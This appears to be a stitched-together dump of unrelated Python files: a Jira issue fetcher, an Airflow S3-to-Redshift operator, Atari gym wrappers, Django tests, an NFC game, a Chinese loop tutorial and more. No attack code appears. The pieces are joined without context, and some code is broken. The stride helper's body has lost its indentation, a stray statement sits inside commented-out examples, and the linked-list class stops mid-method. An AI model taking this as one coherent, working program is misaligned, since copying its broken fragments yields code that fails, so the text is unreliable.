        if 'TINA' in panel.COMPAT_ENGINES:
            panel.COMPAT_ENGINES.remove('TINA')
    # Remove the custom properties added in register().
    del bpy.types.Object.tina_material
    del bpy.types.Light.tina_color
    del bpy.types.Light.tina_strength
    del bpy.types.World.tina_color
    del bpy.types.World.tina_strength
    del bpy.types.Scene.tina_render
    bpy.utils.unregister_class(TinaRenderProperties)
|
import json
from functools import partial
from dateutil.parser import parse
from xml.etree import ElementTree as ET
from pyramid.decorator import reify
from intranet3.asyncfetchers.base import (BaseFetcher, CSVParserMixin,
SimpleProtocol, BasicAuthMixin,
FetchException, Bug, cached_bug_fetcher)
from intranet3 import helpers as h
from intranet3.log import EXCEPTION_LOG, INFO_LOG
LOG = INFO_LOG(__name__)
EXCEPTION = EXCEPTION_LOG(__name__)
class JiraBug(Bug):
    """Jira-specific Bug: URL building plus blocked/unassigned predicates."""
    def get_url(self, number=None):
        """Return the issue URL for this bug, or for *number* if given."""
        number = number if number else self.id
        return self.tracker.url + '/ViewIssue.jspa?id=%(id)s' % {'id': number}
    def is_unassigned(self):
        # owner is '' when Jira reported no assignee (see jira_converter).
        return not self.owner
    @reify
    def is_blocked(self):
        """True when any dependency is known to be unresolved (cached by reify)."""
        for bug_data in self.dependson.values():
            # A missing 'resolved' key defaults to True, i.e. not blocking.
            if bug_data.get('resolved', True) is False:
                return True
        return False
    def get_status(self):
        return self.status
    def get_resolution(self):
        return self.resolution
def _fetcher_function(resolved, single):
    """Build a JiraFetcher method that fetches (un)resolved bugs.

    resolved -- fetch done (True) or not-done (False) issues
    single   -- restrict to issues assigned to the fetcher's login
    The result is cached per (resolved, single) key by cached_bug_fetcher.
    """
    @cached_bug_fetcher(lambda: u'resolved-%s-single-%s' % (resolved, single))
    def fetcher(self):
        jql_params = []
        if resolved:
            jql_params.append('status=done')
        else:
            jql_params.append('status!=done')
        if single:
            jql_params.append('assignee=' + self.login)
        # '+AND+' is the URL-encoded JQL conjunction.
        jql = '+AND+'.join(jql_params)
        url = '%(url)s/rest/api/2/search?jql=%(jql)s&fields=%(fields)s' % \
            {'url': self.tracker.url,
            'jql': jql,
            'fields': self.get_fields_list()}
        self.fetch_get(url)
    return fetcher
def _query_fetcher_function(resolved=False, all=False):
    """Build a JiraFetcher method that searches by project/component/version.

    resolved -- when not *all*, restrict to done (True) or not-done (False)
    all      -- ignore resolution status entirely
    """
    def fetcher(self, ticket_ids, project_selector, component_selector,
            version):
        clauses = ['project=' + project_selector]
        if component_selector:
            clauses.append(build_query_alternative('component',
                                                   component_selector))
        if version:
            clauses.append(build_query_alternative('affectedVersion',
                                                   version))
        if ticket_ids:
            clauses.append(build_query_alternative('id', ticket_ids))
        if not all:
            clauses.append('status=done' if resolved else 'status!=done')
        # '+AND+' is the URL-encoded JQL conjunction.
        url = '%(url)s/rest/api/2/search?jql=%(jql)s&fields=%(fields)s' % {
            'url': self.tracker.url,
            'jql': '+AND+'.join(clauses),
            'fields': self.get_fields_list(),
        }
        self.fetch_get(url)
    return fetcher
def build_query_alternative(field, data):
    """Render a JQL OR-group, e.g. ('id', ['1', '2']) -> '(id=1+OR+id=2)'."""
    return '(' + '+OR+'.join(field + '=' + item for item in data) + ')'
def get_blocked(d):
    """Map outward issue links of type '10000' to {id: {'desc', 'resolved'}}.

    'resolved' is True when the linked issue's status id is '10000'.
    """
    blocked = {}
    for link in d['fields']['issuelinks']:
        if link['type']['id'] == '10000' and 'outwardIssue' in link:
            issue = link['outwardIssue']
            blocked[issue['id']] = {
                'desc': issue['fields']['summary'],
                'resolved': issue['fields']['status']['id'] == '10000',
            }
    return blocked
# Maps a decoded Jira REST issue dict `d` onto Bug constructor keyword
# arguments; each entry is a small accessor lambda.  Status/resolution id
# '10000' is treated as "done" throughout this module.
jira_converter = h.Converter(
    id=lambda d: d['id'],
    desc=lambda d: d['fields']['summary'],
    reporter=lambda d: d['fields']['reporter']['name'],
    # Unassigned issues have assignee == None; normalize to ''.
    owner=lambda d: d['fields']['assignee']['name'] if d['fields']['assignee']
    else '',
    priority=lambda d: d['fields']['priority']['name'],
    # Jira has no separate severity; priority is reused.
    severity=lambda d: d['fields']['priority']['name'],
    status=lambda d: d['fields']['status']['name'],
    resolution=lambda d: d['fields']['resolution'],
    project_name=lambda d: d['fields']['project']['name'],
    component_name=lambda d: ', '.join(map(lambda c: c['name'], d['fields']
    ['components'])),
    # Missing dates are normalized to '' rather than None.
    deadline=lambda d: parse(d['fields']['duedate']) if d['fields']['duedate']
    else '',
    opendate=lambda d: parse(d['fields']['created']),
    changeddate=lambda d: parse(d['fields']['updated']) if d['fields']
    ['updated'] else '',
    labels=lambda d: d['fields']['labels'],
    # Subtasks become the dependency map {id: {'desc', 'resolved'}}.
    dependson=lambda d: dict(map(lambda t: (t['id'], {'desc': t['fields']
    ['summary'], 'resolved': t['fields']['status']['id'] == '10000'}),
    d['fields']['subtasks'])),
    blocked=get_blocked
)
class JiraFetcher(BasicAuthMixin, CSVParserMixin, BaseFetcher):
    """ Fetcher for Jira bugs """
    bug_class = JiraBug
    get_converter = lambda self: jira_converter
    # Issue fields requested from the REST search endpoint.
    FIELDS = ['summary', 'reporter', 'assignee', 'priority', 'status',
        'resolution', 'project', 'components', 'duedate', 'created', 'updated',
        'labels', 'subtasks', 'issuelinks']
    def fetch_get(self, url, on_success=None):
        """Issue an authenticated GET; defaults to the responded callback."""
        if not on_success:
            on_success = self.responded
        url = url.encode('utf-8')
        headers = self.get_headers()
        self.request(url, headers, on_success, method='GET')
    def parse(self, data):
        """Yield bug_class instances from a Jira JSON search response."""
        converter = self.get_converter()
        json_data = json.loads(data)
        for bug_desc in json_data['issues']:
            yield self.bug_class(
                tracker=self.tracker,
                **converter(bug_desc)
            )
    def get_fields_list(self):
        # Comma-separated list for the REST 'fields' query parameter.
        return ','.join(self.FIELDS)
    # Prebuilt fetcher methods; see _fetcher_function/_query_fetcher_function.
    fetch_user_tickets = _fetcher_function(resolved=False, single=True)
    fetch_all_tickets = _fetcher_function(resolved=False, single=False)
    fetch_user_resolved_tickets = _fetcher_function(resolved=True, single=True)
    fetch_all_resolved_tickets = _fetcher_function(resolved=True, single=False)
    fetch_bugs_for_query = _query_fetcher_function(resolved=False)
    fetch_resolved_bugs_for_query = _query_fetcher_function(resolved=True)
    fetch_all_bugs_for_query = _query_fetcher_function(all=True)
|
#!/usr/bin/env python
import os
import glob
# List the current directory contents.
cur_dir = os.getcwd()
dir_content = os.listdir(cur_dir)
for content in dir_content:
    # print() call form replaces the Python-2-only `print content` statement
    # and is valid on both Python 2 and 3.
    print(content)
def createTestDir(dir_name):
    """Create *dir_name* with an empty testfile.txt inside, and chdir into it.

    Returns the directory listing. Safe to call twice: an existing directory
    is reused instead of raising OSError/FileExistsError.
    """
    if not os.path.isdir(dir_name):
        os.mkdir(dir_name)
    os.chdir(dir_name)
    # Context manager guarantees the handle is closed (was open()/close()).
    with open('testfile.txt', 'w'):
        pass
    # BUGFIX: the original listed os.listdir(dir_name) AFTER chdir-ing into
    # it, which crashed for relative names; list the new cwd instead, and
    # return the result rather than discarding it.
    return os.listdir('.')
print("Running test dir first time")
# NOTE(review): hard-coded absolute path — this only works on the original
# author's machine; consider deriving it from os.getcwd() or an argument.
dir_name = os.path.join('/Users/vlasp/src/amzn/feabhas_python/TestDirectory')
createTestDir(dir_name)
def addFiles(dir_name):
    """Create four empty sample files (two .txt, two .py) inside *dir_name*.

    Side effect: the process cwd is changed to dir_name.
    """
    os.chdir(dir_name)
    # Loop + context manager replaces four copy-pasted open()/close() pairs.
    for filename in ('file1.txt', 'file2.txt', 'file3.py', 'file4.py'):
        with open(filename, 'w'):
            pass
print("Adding files to the dir")
# NOTE(review): hard-coded absolute path; see note above the first run.
dir_name = os.path.join('/Users/vlasp/src/amzn/feabhas_python/TestDirectory')
addFiles(dir_name)
# print() call form replaces the Python-2-only `print expr` statement.
print(glob.glob(os.path.join(dir_name,'*.txt')))
print("Running test dir second time")
createTestDir('TestDirectory')
|
from models.company import Company
class DataStorage:
    """In-memory store of companies, their jobs, and job tags."""
    def __init__(self):
        self.companies = []
        self.jobs = []
        self.job_tags = []  # List of tuples (job_tag, id)
    def add_job_tag(self, j):
        """Add a job tag if not already present; return True when added."""
        if j not in self.job_tags:
            self.job_tags.append(j)
            return True
        return False
    def add_job_to_company(self, job):
        """Attach *job* (a dict with 'company_id') to its company.

        BUGFIX: previously raised AttributeError when the company id was
        unknown (get_company returned None); now returns False instead.
        """
        company = self.get_company(job['company_id'])
        if company is None:
            return False
        company.jobs.append(job)
        return True
    def add_jobtag_to_company(self, job_tag, company_id):
        """Attach *job_tag* to the company with *company_id*.

        Returns False (instead of crashing) when the company is unknown.
        """
        company = self.get_company(company_id)
        if company is None:
            return False
        company.job_tags.append(job_tag)
        return True
    def add_company(self, company):
        """Add *company* unless one with the same id exists; True when added."""
        # Renamed the loop variable: the original comprehension reused the
        # name `company`, shadowing the parameter and hurting readability.
        if company.id not in [existing.id for existing in self.companies]:
            self.companies.append(company)
            return True
        return False
    def get_company(self, companyid):
        """Return the stored company with id *companyid*, or None."""
        for co in self.companies:
            if companyid == co.id:
                return co
        return None
    def check_company_exists(self, companyid):
        """True when a stored company has id *companyid*."""
        return any(co.id == companyid for co in self.companies)
    def save_available_jobs_CSV(self):
        """Write 'company,job title' CSV rows to open_positions.csv.

        NOTE(review): `Utils` is not imported in this module — the save
        methods raise NameError when called; confirm the intended import.
        """
        try:
            rows = ''
            for company in self.companies:
                for job in company.jobs:
                    rows += f'{company.name},{job.title}\n'
        except Exception as e:
            print(e)
            return False
        return Utils.save_to_txt('open_positions.csv', rows)
    # TODO: Save data into a json template
    def save_data_json(self):
        """Dump every company's dict representation to alldata.json."""
        data = [company.get_Company_dict() for company in self.companies]
        return Utils.save_to_json('alldata.json', data)
#!/usr/bin/env python
# coding: utf-8
import nfc
import time
import vlc
import os
# Initial setup (translated from: 初期設定)
p = vlc.MediaPlayer()  # shared media player used by the tag handler
count = 0              # number of card touches so far
loop = 0               # last tag id handled (avoids re-triggering on the same tag)
# Decide whether the presented tag is the real treasure (translated from: 財宝を判定する)
def connected(tag):
    """NFC on-connect callback: judge the tag and play the matching sound."""
    global count
    global loop
    # "N回目" = "touch number N".
    print str(count+1) + "回目"
    # Tag UID as an upper-case hex string (Python 2 str.encode('hex')).
    judge = str(tag.identifier).encode('hex').upper()
    # Real treasure (translated from: 本物の財宝の場合)
    if judge == '04808D72845C81':
        # Only play the sound when a different tag than last time is seen.
        if judge != loop:
            print "正解"
            # NOTE(review): set_mrl('') loads an empty media path — presumably
            # a real audio file path belongs here; confirm.
            p.set_mrl('')
            p.play()
            p.set_time(15000)
            p.stop()
            loop = judge
        print "本物の財宝が乗っています"
        count += 1
        time.sleep(1)
    # Fake treasure (translated from: 偽物の財宝の場合)
    else:
        if judge != loop:
            print "不正解"
            p.set_mrl('')
            p.play()
            p.set_time(1000)
            p.stop()
            loop = judge
        print "偽物の財宝が乗っています"
        count += 1
        time.sleep(1)
# Show the process ID (translated from: プロセスID表示) so the game can be
# stopped externally with kill.
print "プロセスID:" + str(os.getpid())
# Wait for a tag touch; `connected` fires on each contact
# (translated from: 財宝を感知した時).
while True:
    clf = nfc.ContactlessFrontend('usb')
    clf.connect(rdwr={'on-connect': connected})
    clf = ""
# NOTE(review): unreachable — the loop above never breaks.
print "ゲームオーバー"
|
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
from airflow.contrib.hooks.aws_hook import AwsHook
class StageToRedshiftOperator(BaseOperator):
    """Copy JSON data from S3 into an AWS Redshift staging table.

    Builds and runs a Redshift COPY command using credentials fetched via
    the given Airflow AWS connection. ``s3_path`` is templated, so it may
    contain Jinja expressions (e.g. the execution date).
    """
    ui_color = '#358140'
    template_fields = ("s3_path",)

    @apply_defaults
    def __init__(self,
                 redshift_conn_id="",
                 aws_credentials_id="",
                 table_name="",
                 s3_path="",
                 region="",
                 json_format="auto",
                 *args, **kwargs):
        super(StageToRedshiftOperator, self).__init__(*args, **kwargs)
        # Connection ids for the two hooks used in execute().
        self.redshift_conn_id = redshift_conn_id
        self.aws_credentials_id = aws_credentials_id
        # COPY statement parameters.
        self.table_name = table_name
        self.s3_path = s3_path
        self.region = region
        self.json_format = json_format
        # Kept for reference; the execution date normally comes from context.
        self.execution_date = kwargs.get('execution_date')
        self.kwargs = kwargs

    def execute(self, context):
        """
        Performs copy procedure from S3 to AWS Redshift.
        """
        # Fetch AWS credentials to embed in the COPY statement.
        hook = AwsHook(self.aws_credentials_id)
        creds = hook.get_credentials()
        copy_sql = f"""copy {self.table_name} from '{self.s3_path}'
        access_key_id '{creds.access_key}'
        secret_access_key '{creds.secret_key}'
        compupdate off region '{self.region}'
        timeformat as 'epochmillisecs'
        truncatecolumns blanksasnull emptyasnull
        format as json '{self.json_format}';
        """
        self.log.info(f'Staging table {self.table_name} to AWS Redshift...')
        pg_hook = PostgresHook(postgres_conn_id=self.redshift_conn_id)
        pg_hook.run(copy_sql)
        self.log.info(f"Table {self.table_name} staged successfully!")
|
import numpy as np
from math import ceil, floor
def rolling_window(image, window_size, stride):
    '''
    Extract every window of shape ``window_size`` from ``image``.

    Parameters
    ----------
    image : (X, Y) ndarray to apply the rolling window on.
    window_size : tuple (winX, winY).
    stride : tuple (dX, dY) — step between consecutive windows.

    Returns
    -------
    (nX, nY, winX, winY) ndarray with the same dtype as ``image``, where
    [i, j] holds the window whose top-left corner is (i*dX, j*dY).
    '''
    X, Y = image.shape
    winX, winY = window_size
    dX, dY = stride
    # Number of full windows that fit along each axis.
    nX = (X - winX) // dX + 1
    nY = (Y - winY) // dY + 1
    # np.empty with an explicit dtype keeps integer images integer
    # (np.zeros defaulted to float64 and silently upcast the data).
    arr = np.empty(shape=(nX, nY, winX, winY), dtype=image.dtype)
    for i in range(nX):
        for j in range(nY):
            x = i * dX
            y = j * dY
            arr[i, j, :, :] = image[x:x + winX, y:y + winY]
    return arr
def get_stride(image_size, window_size, coverage=0.5):
    """Return per-axis strides (sX, sY) so that consecutive windows overlap
    by at least ``coverage`` of their extent along each axis."""
    (X, Y), (wX, wY) = image_size, window_size
    return (_get_stride_calc(X, wX, coverage),
            _get_stride_calc(Y, wY, coverage))
def _get_stride_calc(img, win, coverage):
n_wins = ceil( (img - win) / floor(win * coverage) )
return floor( (img - win) / n_wins ) |
'''
From https://github.com/colinskow/move37/blob/master/dqn/lib/wrappers.py
'''
import cv2
import gym
import gym.spaces
import numpy as np
import collections
import asyncio
class NoopResetEnv(gym.Wrapper):
    """On reset, take a random number (1..noop_max) of NOOP actions so the
    agent starts from varied initial states. NOOP must be action 0."""

    def __init__(self, env, noop_max=30):
        gym.Wrapper.__init__(self, env)
        self.noop_max = noop_max
        self.override_num_noops = None  # set externally to force a count
        self.noop_action = 0
        assert env.unwrapped.get_action_meanings()[0] == 'NOOP'

    def reset(self, **kwargs):
        """Reset, then advance with 1..noop_max no-ops (re-reset on done)."""
        self.env.reset(**kwargs)
        if self.override_num_noops is None:
            noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)  # pylint: disable=E1101
        else:
            noops = self.override_num_noops
        assert noops > 0
        obs = None
        for _ in range(noops):
            obs, _, done, _ = self.env.step(self.noop_action)
            if done:
                obs = self.env.reset(**kwargs)
        return obs

    def step(self, ac):
        return self.env.step(ac)
class MaxAndSkipEnv(gym.Wrapper):
    """Repeat each action for ``skip`` frames and return the pixel-wise max
    of the last two raw frames (removes Atari sprite flicker)."""

    def __init__(self, env=None, skip=4):
        super(MaxAndSkipEnv, self).__init__(env)
        # Most recent raw observations, for max pooling across time steps.
        self._obs_buffer = collections.deque(maxlen=2)
        self._skip = skip

    def step(self, action):
        total = 0.0
        done = None
        for _ in range(self._skip):
            obs, reward, done, info = self.env.step(action)
            self._obs_buffer.append(obs)
            total += reward
            if done:
                break
        pooled = np.max(np.stack(self._obs_buffer), axis=0)
        return pooled, total, done, info

    def reset(self):
        """Clear the frame buffer and seed it with the first observation."""
        self._obs_buffer.clear()
        first = self.env.reset()
        self._obs_buffer.append(first)
        return first
class EpisodicLifeEnv(gym.Wrapper):
    def __init__(self, env):
        """Make end-of-life == end-of-episode, but only reset on true game over.
        Done by DeepMind for the DQN and co. since it helps value estimation.
        """
        gym.Wrapper.__init__(self, env)
        self.lives = 0             # lives observed at the previous step
        self.was_real_done = True  # whether the underlying episode truly ended
    def step(self, action):
        obs, reward, done, info = self.env.step(action)
        self.was_real_done = done
        # check current lives, make loss of life terminal,
        # then update lives to handle bonus lives
        lives = self.env.unwrapped.ale.lives()
        if lives < self.lives and lives > 0:
            # for Qbert sometimes we stay in lives == 0 condtion for a few frames
            # so its important to keep lives > 0, so that we only reset once
            # the environment advertises done.
            done = True
        self.lives = lives
        return obs, reward, done, info
    def reset(self, **kwargs):
        """Reset only when lives are exhausted.
        This way all states are still reachable even though lives are episodic,
        and the learner need not know about any of this behind-the-scenes.
        """
        if self.was_real_done:
            obs = self.env.reset(**kwargs)
        else:
            # no-op step to advance from terminal/lost life state
            obs, _, _, _ = self.env.step(0)
        self.lives = self.env.unwrapped.ale.lives()
        return obs
class FireResetEnv(gym.Wrapper):
    def __init__(self, env=None):
        """For environments where the user needs to press FIRE for the game to start."""
        super(FireResetEnv, self).__init__(env)
        assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
        assert len(env.unwrapped.get_action_meanings()) >= 3
    def step(self, action):
        return self.env.step(action)
    def reset(self):
        # Press FIRE (action 1) then action 2 to kick the game off.
        self.env.reset()
        obs, _, done, _ = self.env.step(1)
        if done:
            self.env.reset()
        obs, _, done, _ = self.env.step(2)
        if done:
            self.env.reset()
        # NOTE(review): if that last step ended the episode, the returned obs
        # is the terminal frame rather than the fresh post-reset one — same
        # as upstream baselines; confirm this is intended.
        return obs
class ProcessFrame(gym.ObservationWrapper):
    """Downsample RGB Atari frames to 84x84 single-channel uint8 images."""

    def __init__(self, env=None):
        super(ProcessFrame, self).__init__(env)
        self.observation_space = gym.spaces.Box(low=0, high=255, shape=(84, 84, 1), dtype=np.uint8)

    def observation(self, obs):
        return ProcessFrame.process(obs)

    @staticmethod
    def process(frame):
        # ITU-R 601 luma transform: RGB -> grayscale float.
        rgb = frame.astype(np.float32)
        gray = rgb[:, :, 0] * 0.299 + rgb[:, :, 1] * 0.587 + rgb[:, :, 2] * 0.114
        # Resize to 84x110, then crop the 84x84 playing area.
        shrunk = cv2.resize(gray, (84, 110), interpolation=cv2.INTER_AREA)
        cropped = shrunk[18:102, :]
        return np.reshape(cropped, [84, 84, 1]).astype(np.uint8)
class BufferWrapper(gym.ObservationWrapper):
    """Stack the last ``n_steps`` observations along the channel axis."""

    def __init__(self, env, n_steps, dtype=np.float32):
        super(BufferWrapper, self).__init__(env)
        self.dtype = dtype
        old = env.observation_space
        stacked = (*old.shape[:-1], old.shape[-1] * n_steps)
        self.observation_space = gym.spaces.Box(low=0, high=255, shape=stacked, dtype=dtype)

    def reset(self):
        # Start from an all-zero stack, then push the first frame.
        self.buffer = np.zeros_like(self.observation_space.low, dtype=self.dtype)
        return self.observation(self.env.reset())

    def observation(self, observation):
        # Shift the stack one frame left; newest frame goes in the last slot.
        self.buffer[:, :, :-1] = self.buffer[:, :, 1:]
        self.buffer[:, :, -1] = observation[:, :, 0]
        return self.buffer
class ScaledFloatFrame(gym.ObservationWrapper):
    """Convert uint8 pixel observations to floats in [0, 1]."""

    def __init__(self, env):
        gym.ObservationWrapper.__init__(self, env)
        self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)

    def observation(self, obs):
        as_float = np.array(obs).astype(np.float32)
        return as_float / 255.0
class ClipRewardEnv(gym.RewardWrapper):
    """Bin every reward to {+1, 0, -1} by its sign."""

    def __init__(self, env):
        gym.RewardWrapper.__init__(self, env)

    def reward(self, reward):
        return np.sign(reward)
class ParallelEnvWrapper(object):
    """Run ``num_envs`` copies of an environment behind one step(actions) API.

    Tracks a per-env cumulative reward and, when an env finishes, resets it
    and reports the episode total in info['episode'].

    NOTE(review): despite the asyncio plumbing, each coroutine is awaited
    individually via run_until_complete, so the envs are stepped
    sequentially, not in parallel — confirm this is intended.
    """
    def __init__(self, env_fn, env_id, num_envs):
        self.num_envs = num_envs
        self.envs = [env_fn(env_id, training=True) for i in range(self.num_envs)]
        self.obs = [env.reset() for env in self.envs]
        self.reward = [0 for i in range(self.num_envs)]  # running episode totals
        self.action_space = self.envs[0].action_space
        self.observation_space = self.envs[0].observation_space
        self.loop = asyncio.get_event_loop()
    def step(self, actions):
        # One action per env; returns tuples of obs, rewards, dones, infos.
        results = [self.loop.run_until_complete(self._step(i, actions[i])) for i in range(self.num_envs)]
        self.obs, r, d, info = zip(*results)
        return self.obs, r, d, info
    async def _step(self, i, action):
        obs_r_d_info = None  # (kept implicit; see returns below)
        o, r, d, info = self.envs[i].step(action)
        self.reward[i] += r
        if d == True:
            # Episode over: auto-reset and surface the episode total.
            o = self.envs[i].reset()
            info['episode'] = { 'total_reward': self.reward[i] }
            self.reward[i] = 0
        return o, r, d, info
def make_atari(env_id, training=True):
    """Build a DeepMind-style preprocessed Atari env (NoFrameskip ids only).

    Training mode adds the wrappers that help learning (random no-ops,
    episodic life, reward clipping); evaluation mode omits them.
    """
    env = gym.make(env_id)
    assert 'NoFrameskip' in env.spec.id
    if training:
        env = NoopResetEnv(env, noop_max=30)
    env = MaxAndSkipEnv(env, skip=4)
    if training:
        env = EpisodicLifeEnv(env)
    if 'FIRE' in env.unwrapped.get_action_meanings():
        env = FireResetEnv(env)
    env = ProcessFrame(env)
    env = BufferWrapper(env, 4)
    env = ScaledFloatFrame(env)
    return ClipRewardEnv(env) if training else env
def make_gym(env_id, training=True):
    """Thin wrapper around gym.make; ``training`` is currently unused."""
    env = gym.make(env_id)
    # if training: env = ClipRewardEnv(env)
    return env
|
from rest_framework import routers, viewsets, serializers
from daphne import models as m
class PageSerializer(serializers.ModelSerializer):
    """Serializes all fields of the Page model."""
    class Meta:
        model = m.Page
        # DRF >= 3.3 requires an explicit field declaration on
        # ModelSerializer; without it serializer init raises AssertionError.
        fields = '__all__'
class TestViewSet(viewsets.ModelViewSet):
    """Full CRUD API over Page objects using PageSerializer."""
    queryset = m.Page.objects.all()
    serializer_class = PageSerializer
router = routers.DefaultRouter()
# Router prefixes are plain strings — DRF adds its own regex anchors,
# so the prefix must not include a leading '^'.
router.register(r'users', TestViewSet)
|
def solution(s):
    """Capitalize each space-separated token of *s* (JadenCase style).

    Splitting on a single space preserves runs of consecutive spaces;
    str.capitalize lowercases the remainder of each token.
    """
    words = s.lower().split(' ')
    return " ".join(word.capitalize() for word in words)
from django.test import TestCase
from datetime import datetime, date
from django.utils.timezone import make_aware
from ..models import Company, RawPrices
class CompanyModelTests(TestCase):
    def test_is_empty(self):
        """Initially no Company rows exist."""
        saved_companys = Company.objects.all()
        self.assertEqual(saved_companys.count(), 0)
    def test_is_count_one(self):
        """Saving a single record yields exactly one row."""
        company = Company(code=1, name='test_text')
        company.save()
        saved_companys = Company.objects.all()
        self.assertEqual(saved_companys.count(), 1)
    def test_saving_and_retrieving_company(self):
        """A saved record round-trips with the same field values."""
        company = Company()
        code = 2
        name = 'test_text2'
        company.code = code
        company.name = name
        company.save()
        saved_companys = Company.objects.all()
        actual_company = saved_companys[0]
        self.assertEqual(actual_company.code, code)
        self.assertEqual(actual_company.name, name)
class RawPricesModelTests(TestCase):
    def test_is_empty(self):
        """Initially no RawPrices rows exist."""
        saved_raw_prices = RawPrices.objects.all()
        self.assertEqual(saved_raw_prices.count(), 0)
    def test_is_count_one(self):
        """Saving a single record yields exactly one row."""
        raw_prices = RawPrices(code=1, date=date.today(), datetime=make_aware(datetime.now()), open_price=1,
                               close_price=2, high_price=3, low_price=1,
                               volume=100, adjustment_close_price=2, moving_averages25=0.0, moving_averages75=0.0)
        raw_prices.save()
        saved_raw_prices = RawPrices.objects.all()
        self.assertEqual(saved_raw_prices.count(), 1)
    def test_saving_and_retrieving_raw_prices(self):
        """A saved record round-trips with the same field values."""
        raw_prices = RawPrices()
        code = 2
        dated = date.today()
        datetimed = make_aware(datetime.now())
        open_price = 2
        close_price = 6
        high_price = 10
        low_price = 1
        volume = 1000
        adjustment_close_price = 6
        moving_averages25 = 1.0
        moving_averages75 = 2.0
        raw_prices.code = code
        raw_prices.date = dated
        raw_prices.datetime = datetimed
        raw_prices.open_price = open_price
        raw_prices.close_price = close_price
        raw_prices.high_price = high_price
        raw_prices.low_price = low_price
        raw_prices.volume = volume
        raw_prices.adjustment_close_price = adjustment_close_price
        raw_prices.moving_averages25 = moving_averages25
        raw_prices.moving_averages75 = moving_averages75
        raw_prices.save()
        saved_raw_prices = RawPrices.objects.all()
        actual_raw_prices = saved_raw_prices[0]
        self.assertEqual(actual_raw_prices.code, code)
        self.assertEqual(actual_raw_prices.date, dated)
        self.assertEqual(actual_raw_prices.datetime, datetimed)
        self.assertEqual(actual_raw_prices.open_price, open_price)
        self.assertEqual(actual_raw_prices.close_price, close_price)
        self.assertEqual(actual_raw_prices.high_price, high_price)
        self.assertEqual(actual_raw_prices.low_price, low_price)
        self.assertEqual(actual_raw_prices.volume, volume)
        self.assertEqual(actual_raw_prices.adjustment_close_price, adjustment_close_price)
        self.assertEqual(actual_raw_prices.moving_averages25, moving_averages25)
        self.assertEqual(actual_raw_prices.moving_averages75, moving_averages75)
|
# break 強制結束迴圈
# while 布林值:
# break
# 程式範例
# n=1
# while n<5:
# if n==3:
# break
# n+=1
# print(n) # 印出 3
# for 變數名稱 in 列表/字串:
# break
# continue 強制繼續下一圈
# while 布林值:
# continue
# for 變數名稱 in 列表/字串:
# continue
# 程式範例
# n=0
# for x in [0,1,2,3]: # x 會跑 4 圈, 分別為 0, 1, 2, 3
# if x%2==0: # 若餘數=0, 強制下一圈
# continue # x=0, 因餘數為0, 所以強制下一圈, 執行 x=1,
# n+=1 # x=1, 餘數不為0, n+=1 => n=1, 執行 x=2,
# print(n) # 印出 2 # x=2, 因餘數為0, 所以強制下一圈, 執行 x=3,
# # x=3, 餘數不為0, n+=1 => n=2, print(n) => 2
# else
# 基本語法
# while 布林值:
# 若布林值為 True, 執行命令
# 回到上方, 做下次的迴圈判定
# else:
# 迴圈結束前, 執行此區塊的命令 # while 跑完後執行
# 程式範例
# n=1
# while n<5:
# print("變數 n 的資料是:", n)
# n+=1
# else:
# print(n) # 結束迴圈前, 印出 5
# 執行結果
# 變數 n 的資料是: 1
# 變數 n 的資料是: 2
# 變數 n 的資料是: 3
# 變數 n 的資料是: 4
# 5
# 基本語法
# for 變數名稱 in 列表/字串
# 將列表中的項目或字串中的字元逐一取出, 逐一處理
# else:
# 迴圈結束前, 執行此區塊的指令 # while 跑完後執行
# 程式範例
# for c in "Hello":
# print("逐一取得字串中的字元", c)
# else:
# print(c) # 結束迴圈前, 印出 o
# 執行結果
# 逐一取得字串中的字元 H
# 逐一取得字串中的字元 e
# 逐一取得字串中的字元 l
# 逐一取得字串中的字元 l
# 逐一取得字串中的字元 o
# o
# break 的簡易範例
# n=0
# while n<5:
# if n==3:
# break
# print(n) # 印出迴圈中的 n
# n+=1
# print("最後的 n: ", n) # 印出迴圈結束後的 n
# 執行結果
# 0
# 1
# 2
# 最後的 n: 3
# Simple `continue` example
n=0  # NOTE(review): stray uncommented statement — the rest of this example is commented out; likely meant to be `# n=0`
# for x in [0,1,2,3]:
# if x%2==0:
# continue
# print(x)
# n+=1
# print("最後的 n: ", n)
# 執行結果
# 1
# 3
# 最後的 n: 2
# else 的簡易範例
# sum=0
# for n in range(11):
# sum+=n
# else:
# print(sum) # 印出 0+1+2+...+10 的結果 # 印出 55
# 綜合範例: 找出整數平方根
# 輸入 9, 得到 3
# 輸入 11, 得到【沒有】整數的平方根
# n=input("輸入一個正整數: ")
# n=int(n) # 轉換輸入成數字
# for i in range(n): # i 從 0 ~ n-1
# if i*i==n:
# print("整數平方根", i)
# break # 用break 強制結束迴圈時, 不會執行 else 區塊
# else:
# print("沒有整數平方根")
|
# !/usr/bin/python3
# -*- coding: utf-8 -*-
# @Author:梨花菜
# @File: 链表.py
# @Time : 2020/3/28 20:29
# @Email: lihuacai168@gmail.com
# @Software: PyCharm
class Node:
    """Singly-linked list node: a payload plus a pointer to the next node."""
    def __init__(self, data_val):
        self.data_val = data_val  # payload value
        self.next_val = None      # next node, or None at the tail
class LinkedList:
    """Minimal singly-linked list keyed by node payload."""

    def __init__(self):
        self.head_val = None

    def list_print(self):
        """Print every payload from head to tail, one per line."""
        node = self.head_val
        while node is not None:
            print(node.data_val)
            node = node.next_val

    def at_begin(self, new_data):
        """Prepend a node holding *new_data*."""
        node = Node(new_data)
        node.next_val = self.head_val
        self.head_val = node

    def at_end(self, new_data):
        """Append a node holding *new_data*."""
        node = Node(new_data)
        # Empty list: the new node becomes the head.
        if self.head_val is None:
            self.head_val = node
            return
        # Walk to the last node (the one with no successor).
        tail = self.head_val
        while tail.next_val:
            tail = tail.next_val
        tail.next_val = node

    def in_between(self, middle_node, new_data):
        """Insert *new_data* immediately after *middle_node*."""
        if middle_node is None:
            print("找不到节点")
            return
        node = Node(new_data)
        # Splice: new node inherits the successor, predecessor points to it.
        node.next_val = middle_node.next_val
        middle_node.next_val = node

    def remove_node(self, remove_key):
        """Delete the first node whose payload equals *remove_key*."""
        current = self.head_val
        # Key at the head: just advance the head pointer.
        if current is not None:
            if current.data_val == remove_key:
                self.head_val = current.next_val
                current = None
                return
        # Walk until the key is found, remembering the previous node.
        while current is not None:
            if current.data_val == remove_key:
                break
            prev = current
            current = current.next_val
        # Key not present: nothing to do.
        if current is None:
            return
        # Unlink: predecessor now points past the matched node.
